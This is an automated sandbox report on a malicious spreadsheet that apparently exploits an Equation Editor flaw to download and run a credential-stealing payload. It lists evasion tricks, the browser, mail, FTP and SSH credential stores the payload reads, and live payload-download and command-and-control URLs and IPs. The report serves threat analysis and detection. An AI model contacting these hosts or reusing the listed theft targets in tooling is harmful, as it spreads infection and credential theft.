              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess | graph_5-6942
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2364 | Thread sleep time: -300000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe TID: 2836 | Thread sleep time: -1020000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess | graph_5-6747
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405D7C FindFirstFileA,FindClose
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Thread delayed: delay time: 60000
              Source: C:\Users\Public\vbc.exe | API call chain: ExitProcess graph end node | graph_4-3205
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | API call chain: ExitProcess graph end node | graph_5-6748
              Source: vbc.exe, 00000004.00000002.465419977.0000000000894000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008B0EEB _memset,IsDebuggerPresent
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008B1B15 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008AF18E GetProcessHeap
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008AE750 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_00120402 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_00120616 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_001206C7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_00120706 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_00120744 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 6_2_008AE750 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008AFEB0 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 6_2_008AFEB0 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 6_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Memory written: C:\Users\user\AppData\Local\Temp\xmtxpy.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exe | Process created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Process created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008B350C cpuid
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 5_2_008AF9DD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
              Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: 6_2_00406069 GetUserNameW

              Stealing of Sensitive Information

              Source: Yara match | File source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: PopPassword 6_2_0040D069
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | Code function: SmtpPassword 6_2_0040D069
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts12
              Native API
              Path Interception1
              Extra Window Memory Injection
              1
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium15
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts13
              Exploitation for Client Execution
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              2
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Man in the Browser
              Exfiltration Over Bluetooth1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)111
              Process Injection
              1
              Extra Window Memory Injection
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares2
              Data from Local System
              Automated Exfiltration4
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
              Masquerading
              NTDS26
              System Information Discovery
              Distributed Component Object Model1
              Email Collection
              Scheduled Transfer124
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Virtualization/Sandbox Evasion
              LSA Secrets131
              Security Software Discovery
              SSH1
              Clipboard Data
              Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation
              Cached Domain Credentials11
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items111
              Process Injection
              DCSync1
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Remote System Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              [Behavior graph] Behavior Graph ID: 569962, Sample: _2201S_BUSAN_HOCHIMINH_.xlsx, Startdate: 10/02/2022, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label
_2201S_BUSAN_HOCHIMINH_.xlsx | 35% | Virustotal | -
_2201S_BUSAN_HOCHIMINH_.xlsx | 33% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 21% | Virustotal | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 23% | ReversingLabs | Win32.Backdoor.Androm

Source | Detection | Scanner | Label
6.0.xmtxpy.exe.400000.11.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.2.xmtxpy.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.0.xmtxpy.exe.400000.15.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.xmtxpy.exe.130000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.0.xmtxpy.exe.400000.13.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.0.xmtxpy.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.0.xmtxpy.exe.400000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.0.xmtxpy.exe.400000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              No Antivirus matches

Source | Detection | Scanner | Label
http://198.46.132.195/windowSSH/.win32.exe | 8% | Virustotal | -
http://198.46.132.195/windowSSH/.win32.exe | 100% | Avira URL Cloud | malware
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://asiaoil.bar//bobby/five/fre.php | 1% | Virustotal | -
http://asiaoil.bar//bobby/five/fre.php | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
asiaoil.bar | 172.67.197.66 | true | true | - | unknown

Name | Malicious | Antivirus Detection | Reputation
http://198.46.132.195/windowSSH/.win32.exe | true | 8%, Virustotal; Avira URL Cloud: malware | unknown
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://asiaoil.bar//bobby/five/fre.php | true | 1%, Virustotal; Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr | false | - | high
http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr | false | - | high
http://www.ibsensoftware.com/ | xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
198.46.132.195 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
104.21.49.244 | unknown | United States | 13335 | CLOUDFLARENETUS | true
172.67.197.66 | asiaoil.bar | United States | 13335 | CLOUDFLARENETUS | true

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:569962
                    Start date:10.02.2022
                    Start time:10:20:40
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 3s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:_2201S_BUSAN_HOCHIMINH_.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 72.4% (good quality ratio 69.6%)
                    • Quality average: 78.5%
                    • Quality standard deviation: 27.9%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 77
                    • Number of non-executed functions: 56
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
10:21:38 | API Interceptor | 50x Sleep call for process: EQNEDT32.EXE modified
10:21:47 | API Interceptor | 771x Sleep call for process: xmtxpy.exe modified

Match | Associated Sample Name / URL | Detection | Context
198.46.132.195 | _OCEANA_2201S_BUSAN_HOCHIMINH_.xlsx | malicious | 198.46.132.195/mscloud/.win32.exe
198.46.132.195 | VSL_LNGA01022_ATHENA_HHI 3112_.xlsx | malicious | 198.46.132.195/win-explorer10/.win32.exe
198.46.132.195 | SOA Dec 2021.xlsx | malicious | 198.46.132.195/win_explorer/.win32.exe
198.46.132.195 | _Purchase Order Docs_.xlsx | malicious | 198.46.132.195/Registry/.win32.exe
198.46.132.195 | _Purchase Order_00523_.xlsx | malicious | 198.46.132.195/googleCRC/.win32.exe
104.21.49.244 | RhACfIARBK.exe | malicious | asiaoil.bar//bobby/five/fre.php
104.21.49.244 | 5XDl9pDBBW.exe | malicious | asiaoil.bar//bobby/five/fre.php
104.21.49.244 | _OCEANA_2201S_BUSAN_HOCHIMINH_.xlsx | malicious | asiaoil.bar//bobby/five/fre.php
104.21.49.244 | tVAecH1aRM.exe | malicious | asiaoil.bar//bobby/five/fre.php
172.67.197.66 | RhACfIARBK.exe | malicious | asiaoil.bar//bobby/five/fre.php
172.67.197.66 | 5XDl9pDBBW.exe | malicious | asiaoil.bar//bobby/five/fre.php
172.67.197.66 | _OCEANA_2201S_BUSAN_HOCHIMINH_.xlsx | malicious | asiaoil.bar//bobby/five/fre.php
172.67.197.66 | tVAecH1aRM.exe | malicious | asiaoil.bar//bobby/five/fre.php

Match | Associated Sample Name / URL | Detection | Context
asiaoil.bar | RhACfIARBK.exe | malicious | 104.21.49.244
asiaoil.bar | 5XDl9pDBBW.exe | malicious | 104.21.49.244
asiaoil.bar | _OCEANA_2201S_BUSAN_HOCHIMINH_.xlsx | malicious | 172.67.197.66
asiaoil.bar | tVAecH1aRM.exe | malicious | 172.67.197.66

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) | RhACfIARBK.exe | malicious
C:\Users\user\AppData\Local\Temp\xmtxpy.exe | RhACfIARBK.exe | malicious

                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:downloaded
                        Size (bytes):295124
                        Entropy (8bit):7.944502610174892
                        Encrypted:false
                        SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                        MD5:7DF1896047D9647D818080DD17563D92
                        SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                        SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                        SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: Virustotal, Detection: 21%, Browse
                        • Antivirus: ReversingLabs, Detection: 23%
                        Reputation:low
                        IE Cache URL:http://198.46.132.195/windowSSH/.win32.exe
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):3747
                        Entropy (8bit):7.932023348968795
                        Encrypted:false
                        SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                        MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                        SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                        SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                        SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):1099960
                        Entropy (8bit):2.015315240232208
                        Encrypted:false
                        SSDEEP:3072:gXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:OahIFdyiaT2qtXl
                        MD5:15A27F5C7EF8F89145A89ECF451B90D4
                        SHA1:EC1F1BCB1324FDBB9FAE80EF1003B57D727100F4
                        SHA-256:637B6C47252552D5DBD483BDD47DE9BCB5B041AB0EECBF523FDC0145D8154213
                        SHA-512:78BBBD3DBB637F7BEE3724CEADAFFD362567A951EF9374F1E8398B9C37E0C7A1ECB74BAB56B9B331AC0F524E8E97658BC0625238F2EF383F51420FBFC8EABD22
                        Malicious:false
                        Reputation:low
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):10202
                        Entropy (8bit):7.870143202588524
                        Encrypted:false
                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):2647
                        Entropy (8bit):7.8900124483490135
                        Encrypted:false
                        SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                        MD5:E46357D82EBC866EEBDA98FA8F94B385
                        SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                        SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                        SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):5396
                        Entropy (8bit):7.915293088075047
                        Encrypted:false
                        SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                        MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                        SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                        SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                        SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                        Malicious:false
                        Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
